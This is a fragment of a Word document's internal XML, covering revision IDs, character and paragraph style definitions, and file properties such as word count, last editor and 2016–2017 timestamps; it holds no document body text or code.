    <w:rsid w:val="00467BA8"/>
    <w:rsid w:val="004747E9"/>
    <w:rsid w:val="004779BB"/>
    <w:rsid w:val="004A2C2C"/>
    <w:rsid w:val="004B5AFB"/>
    <w:rsid w:val="0054590D"/>
    <w:rsid w:val="0055075D"/>
    <w:rsid w:val="005613F5"/>
    <w:rsid w:val="00574A55"/>
    <w:rsid w:val="00594AD1"/>
    <w:rsid w:val="005C356D"/>
    <w:rsid w:val="005C4833"/>
    <w:rsid w:val="005D4228"/>
    <w:rsid w:val="005E2847"/>
    <w:rsid w:val="006118A2"/>
    <w:rsid w:val="00615E00"/>
    <w:rsid w:val="006224AC"/>
    <w:rsid w:val="00623879"/>
    <w:rsid w:val="00625802"/>
    <w:rsid w:val="00652256"/>
    <w:rsid w:val="006542B7"/>
    <w:rsid w:val="00667B0B"/>
    <w:rsid w:val="006E378F"/>
    <w:rsid w:val="0074054E"/>
    <w:rsid w:val="00756082"/>
    <w:rsid w:val="00770985"/>
    <w:rsid w:val="00780013"/>
    <w:rsid w:val="00797D49"/>
    <w:rsid w:val="007A2F34"/>
    <w:rsid w:val="007A5427"/>
    <w:rsid w:val="00826C48"/>
    <w:rsid w:val="00860F91"/>
    <w:rsid w:val="00867176"/>
    <w:rsid w:val="00881E29"/>
    <w:rsid w:val="00885FA6"/>
    <w:rsid w:val="008D03A3"/>
    <w:rsid w:val="008E20C1"/>
    <w:rsid w:val="008E5E02"/>
    <w:rsid w:val="008F712E"/>
    <w:rsid w:val="00900333"/>
    <w:rsid w:val="00957BC3"/>
    <w:rsid w:val="00961839"/>
    <w:rsid w:val="00970B29"/>
    <w:rsid w:val="009801A3"/>
    <w:rsid w:val="009B0467"/>
    <w:rsid w:val="009B491C"/>
    <w:rsid w:val="009C26E5"/>
    <w:rsid w:val="009D7814"/>
    <w:rsid w:val="009E7C2D"/>
    <w:rsid w:val="00A06D74"/>
    <w:rsid w:val="00A11EA8"/>
    <w:rsid w:val="00A2309F"/>
    <w:rsid w:val="00A237A6"/>
    <w:rsid w:val="00A422E5"/>
    <w:rsid w:val="00A4680C"/>
    <w:rsid w:val="00A5001E"/>
    <w:rsid w:val="00A60AC4"/>
    <w:rsid w:val="00A809CB"/>
    <w:rsid w:val="00A96CCD"/>
    <w:rsid w:val="00AB09BB"/>
    <w:rsid w:val="00AB11A6"/>
    <w:rsid w:val="00AB2CE6"/>
    <w:rsid w:val="00AC090D"/>
    <w:rsid w:val="00AE097A"/>
    <w:rsid w:val="00AE4EDB"/>
    <w:rsid w:val="00AE61D9"/>
    <w:rsid w:val="00AF6EFD"/>
    <w:rsid w:val="00B21540"/>
    <w:rsid w:val="00B317EF"/>
    <w:rsid w:val="00B372CB"/>
    <w:rsid w:val="00B571E7"/>
    <w:rsid w:val="00B877EE"/>
    <w:rsid w:val="00BB5835"/>
    <w:rsid w:val="00BD2BF6"/>
    <w:rsid w:val="00BF6DB0"/>
    <w:rsid w:val="00C12915"/>
    <w:rsid w:val="00C27D10"/>
    <w:rsid w:val="00CA4C30"/>
    <w:rsid w:val="00CB22A5"/>
    <w:rsid w:val="00CB3E3C"/>
    <w:rsid w:val="00CE4AB7"/>
    <w:rsid w:val="00CF036B"/>
    <w:rsid w:val="00D1460D"/>
    <w:rsid w:val="00D1675A"/>
    <w:rsid w:val="00D2031B"/>
    <w:rsid w:val="00D27165"/>
    <w:rsid w:val="00D71B32"/>
    <w:rsid w:val="00D8159B"/>
    <w:rsid w:val="00D82EAA"/>
    <w:rsid w:val="00D852BD"/>
    <w:rsid w:val="00DA361E"/>
    <w:rsid w:val="00DC57E5"/>
    <w:rsid w:val="00EA4054"/>
    <w:rsid w:val="00EB2649"/>
    <w:rsid w:val="00EB53E8"/>
    <w:rsid w:val="00EE30FE"/>
    <w:rsid w:val="00EF712C"/>
    <w:rsid w:val="00F033A1"/>
    <w:rsid w:val="00F12F2A"/>
    <w:rsid w:val="00F32F64"/>
    <w:rsid w:val="00F54C51"/>
    <w:rsid w:val="00F638F2"/>
    <w:rsid w:val="00FA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17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5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5E02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57B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957BC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17E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kt">
    <w:name w:val="kt"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008F712E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nf">
    <w:name w:val="nf"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008F712E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008F712E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="n">
    <w:name w:val="n"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008F712E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c1">
    <w:name w:val="c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008F712E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mi">
    <w:name w:val="mi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008F712E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005C35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56D"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi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17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5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5E02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57B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957BC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17E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kt">
    <w:name w:val="kt"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008F712E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nf">
    <w:name w:val="nf"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008F712E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008F712E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="n">
    <w:name w:val="n"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008F712E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c1">
    <w:name w:val="c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008F712E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mi">
    <w:name w:val="mi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008F712E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005C35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56D"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi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084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13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2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3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79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gi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FC6A30-5F27-43BD-AB0F-E6B82EAEB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0</Pages>
  <Words>998</Words>
  <Characters>569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PC_Tech</cp:lastModifiedBy>
  <cp:revision>47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-09-24T02:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-26T15:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>